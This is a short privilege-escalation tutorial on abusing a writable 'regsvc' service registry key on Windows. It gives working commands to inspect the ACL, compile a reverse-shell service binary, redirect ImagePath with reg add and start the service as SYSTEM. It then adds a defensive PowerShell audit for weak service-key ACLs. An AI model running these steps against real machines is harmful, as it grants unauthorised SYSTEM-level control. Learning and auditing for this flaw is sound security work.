# Regsvc ACL

## Overview

After enumeration, if we discover that we have full permissions on a service's **registry key**, we can compile a malicious executable written in C and get it to run a command for us as **SYSTEM**.

## Escalation via Regsvc

View permissions on registry key

```powershell
powershell -exec bypass -NoP
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```


Change the command to get a reverse shell and compile the executable


```bash
x86_64-w64-mingw32-gcc windows_service.c -o x.exe 
```

Set the service's `ImagePath` to the executable

```cmd
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
```

* /v - The name of the value to set
* ImagePath - The registry value that contains the path of the service's (or driver's) image file
  * So if you put the path to your file here and start the service, it will run the executable
* /t - The type, here REG\_EXPAND\_SZ, which is an expandable string value
* /d - The data you want to write, here C:\temp\x.exe
* /f - Force: no prompts for confirmation, just execute

Start the service and pop a shell

```cmd
sc start regsvc
```
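
To check for this condition across every service rather than one key at a time, the audit below generalizes the `Get-Acl` step above and lists service keys where a low-privileged principal holds write-level rights. It is an added example, not part of the original page; the SID list and the function name `Get-WeakServiceKeyAcl` are assumptions chosen for illustration.

```powershell
# Added example: audit service registry keys for write access granted to
# low-privileged principals. The SID list is an assumption; extend it with
# any local or domain groups that should not be able to manage services.
$lowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # NT AUTHORITY\Authenticated Users
    'S-1-5-4',       # NT AUTHORITY\INTERACTIVE
    'S-1-5-32-545'   # BUILTIN\Users
)

# Rights that allow changing ImagePath or taking over the key.
# FullControl and WriteKey both include these bits.
$writeRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, ChangePermissions, TakeOwnership'

function Get-WeakServiceKeyAcl {
    param([string]$Root = 'HKLM:\SYSTEM\CurrentControlSet\Services')

    foreach ($key in Get-ChildItem -Path $Root -ErrorAction SilentlyContinue) {
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop }
        catch { continue }   # key not readable by the current account

        # Resolve ACE identities to SIDs so the check is locale-independent.
        $sidType = [System.Security.Principal.SecurityIdentifier]
        foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # Inherit-only ACEs apply to subkeys, not to this key itself.
            if ($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) { continue }
            if ($lowPrivSids -notcontains $ace.IdentityReference.Value) { continue }
            $granted = $ace.RegistryRights -band $writeRights
            if (-not $granted) { continue }

            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value
                Rights    = [System.Security.AccessControl.RegistryRights]$granted
                Inherited = $ace.IsInherited
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

Get-WeakServiceKeyAcl | Format-Table -AutoSize -Wrap
```

Any row returned means that principal can change the service's `ImagePath`; remove the ACE so that only Administrators and SYSTEM can write to the key.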

